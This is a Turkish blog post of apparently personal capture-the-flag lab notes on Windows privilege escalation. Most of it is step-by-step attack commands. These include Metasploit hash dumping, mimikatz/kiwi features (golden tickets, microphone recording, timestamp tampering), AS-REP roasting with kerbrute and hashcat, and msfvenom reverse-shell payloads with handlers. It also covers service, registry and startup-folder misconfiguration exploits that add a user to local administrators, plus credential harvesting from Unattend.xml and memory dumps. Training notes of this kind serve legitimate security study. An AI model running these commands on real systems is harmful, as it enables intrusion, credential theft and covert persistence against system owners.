Windows Privilege Escalation Notes

post/multi/manage/shell_to_meterpreter

sessions -i (oturumu seç)


run post/windows/gather/hashdump -- kullanıcıların id pw verir (SAM veritabanı)


dir C:\  --> listeleme
more flag1.txt --> dosya içeriği okuma
type flag2.txt

C nin içinde tüm flagları arama --> flag* /s /p

http://blog.yigith.com/20-temel-windows-ms-dos-komutu/


icacls komutu, hangi kullanıcı gruplarının belirli bir klasöre / dosyaya erişebileceğini gösterir.


------------

meterpreter > run post/multi/recon/local_exploit_suggester (exploit öner,windows sysuid mimarilerine bak)

privilege -> https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672#:~:text=store%20configuration%20information.-,SeTakeOwnershipPrivilege,the%20owner%20of%20an%20object.

migrate -N PROCESS_NAME

sistemle çalışan bir yere migrate olduktan sonra load kiwi (mimikatz güncel version) yaz.

aşağıdaki komutları (kiwi help) help komutundan görülebilir.

screenshare Kullanılan bir makine ile etkileşime girerken daha kullanışlı olsa da, hangi komut uzak kullanıcının masaüstünü gerçek zamanlı olarak izlememizi sağlar?

record_mic 	Sisteme bağlı bir mikrofondan kayıt yapmak istiyorsak ne olur?

timestomp zaman damgasını değiştir (adlibilişim)


golden_ticket_create   	
Mimikatz, `` altın bilet '' olarak adlandırılan şeyi yaratmamıza izin veriyor ve her yerde kolaylıkla kimlik doğrulamamıza izin veriyor. Hangi komut bunu yapmamıza izin veriyor?



kullanıcının kimlik bilgisi (rdp) aldıysan ve rdp etkin değilse
run post/windows/manage/enable_rdp

makine pinge açık olmayabilir nmap 10.10.171.13 -Pn -v

-x ' e 301 leride ekle

RDP Bağlantısı : xfreerdp /u:user /p:password321 /v:10.10.112.110
rdesktop -u user -p password321 10.10.19.115


gittiğin dzinin her şeyi göstermesi için yolun sonuna /*.* koy


exploit/multi/script/web_delivery  --> kali sistemde port açar uygulandığında windowsta çalışması için kod üretir,hedefte çalıştırdığında bağlantı almış olur

bu bağlantıyı meterpreter çevirmek için --> set payload windows/meterpreter/reverse_http

PSH -> PowerSHell

run -> recent

Dosya açılmıyorsa izin yoksa,özellikler,güvenlik,dosya izinleri,kullanıcı Object Nameye giriş yaptığın kullanıcı adı v.b. yaz Check bas

-----

AS-REP ROASTING


./kerbrute-kali-64 userenum --dc 10.10.71.93 -d spookysec.local userlist.txt -t 100



GetNPUsers.py -no-pass -dc-ip 10.10.71.93 spookysec.local/svc-admin   
(şifre türü en başta yazar)

bulduğun hashi -> hashcat --help (şifre türüne göre numarayı bul)

hashcat -m 18200 -a 0 hash.txt passwordlist.txt --force

Administrator:500:aad3b435b51404eeaad3b435b51404ee:BURASIHASHe4876a80a723612986d7609aa5ebc12bAdministrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b::::::


EVIL WIN RM  -- https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/



****
Auto Run ile shell (? win7)

AutoRun dosyaları C:\Program Files\Autorun Program

win cmd : C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
panel açılıyor ve Logon sekmesinde AutoRun da çalışan program var,
o programın yerine msfvenom ile ürettiğimiz payload ile yer değiştiriyooruz

**************


Registry Escalation - AlwaysInstallElevated



1.Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
2.From the output, notice that “AlwaysInstallElevated” value is 1.
3.In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
4.From the output, notice that “AlwaysInstallElevated” value is 1.


https://ozdenercin.com/2019/06/28/derinlemesine-windows-privilege-escalation-yetki-yukseltmesi/#:~:text=AlwaysInstallElevated%2C%20ayr%C4%B1cal%C4%B1kl%C4%B1%20olmayan%20kullan%C4%B1c%C4%B1lar%C4%B1n%20Microsoft,ayarlanm%C4%B1%C5%9F%20olup%20olmad%C4%B1%C4%9F%C4%B1n%C4%B1%20kontrol%20etmelisiniz.

python3 -m http.server


*******************

Service Escalation - Registry



1. powershell komut istemini açın ve şunu yazın:  Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
2. Çıktının, kullanıcının "NT AUTHORITY \ INTERACTIVE" a ait olduğunu, kayıt defteri anahtarı üzerinde "FullContol" iznine sahip olduğunu gösterdiğine dikkat edin.


c dili ile yazılmış bir windows servisi var,
içindeki kodu system fonksiyonunu düzenleyip -> cmd.exe /k net localgroup administrators user /add

derlemek için : x86_64-w64-mingw32-gcc windows_service.c -o x.exe
kurulu olması gerekir : sudo apt install gcc-mingw-w64

windowsta dosyaya cmd komutu :
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

cmd:
sc start regsvc

net localgroup administrators ' a eklenmiş oluyor.


*************************


Service Escalation - Executable Files


1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
2. Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the filepermservice.exe file.


1. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
2. In command prompt type: sc start filepermsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators


*****************************


Privilege Escalation - Startup Applications



1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.


1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
7. Copy the generated file, x.exe, to the Windows VM.



1. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
2. restart victim pc

3. Meterpreter sessions opened


************************

Service Escalation - DLL Hijacking








*****************************
Service Escalation - binPath


Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

2. Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.

Exploitation

Windows VM

1. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"
2. In command prompt type: sc start daclsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators


**************************


Service Escalation - Unquoted Service Paths 


Detection

Windows VM

1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the “BINARY_PATH_NAME” field displays a path that is not confined between quotes.

Exploitation

Kali VM

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.

Windows VM

1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators


******************************



Potato Escalation - Hot Potato  



Windows VM

1. In command prompt type: powershell.exe -nop -ep bypass
2. In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
4. To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators


*******************************


Password Mining Escalation - Configuration Files  ( C:\Windows\Panther\Unattend.xml )


Exploitation

Windows VM

1. Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml
2. Scroll down to the “<Password>” property and copy the base64 string that is confined between the “<Value>” tags underneath it.

Kali VM

1. In a terminal, type: echo [copied base64] | base64 -d
2. Notice the cleartext password



************************************


Password Mining Escalation - Memory


Exploitation

Kali VM

1.Open command prompt and type: msfconsole
2.In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
3.In Metasploit (msf > prompt) type: set uripath x
4.In Metasploit (msf > prompt) type: run

Windows VM

1.Open Internet Explorer and browse to: http://[Kali VM IP Address]/x
2.Open command prompt and type: taskmgr
3.In Windows Task Manager, right-click on the “iexplore.exe” in the “Image Name” columnand select “Create Dump File” from the popup menu.
4.Copy the generated file, iexplore.DMP, to the Kali VM.

Kali VM

1.Place ‘iexplore.DMP’ on the desktop.
2.Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
3.Select the Copy the Base64 encoded string.
4.In command prompt type: echo -ne [Base64 String] | base64 -d
5.Notice the credentials in the output.


****************************

Privilege Escalation - Kernel Exploits


Establish a shell

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe
7. Copy the generated file, shell.exe, to the Windows VM.

Windows VM

1. Execute shell.exe and obtain reverse shell

Detection & Exploitation

Kali VM

1. In Metasploit (msf > prompt) type: run post/multi/recon/local_exploit_suggester
2. Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation
3. In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif
4. In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]
5. In Metasploit (msf > prompt) type: set LPORT 5555
6. In Metasploit (msf > prompt) type: run

NOTE: The shell might default to your eth0 during this attack.  If so, ensure you type set lhost [Kali VM IP Address] and run again.

windows ctf , windows ctf notes , windows network , windows priv esc , windows privilege escalation , windows security
Bu yazıyı beğendin mi ?0000

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir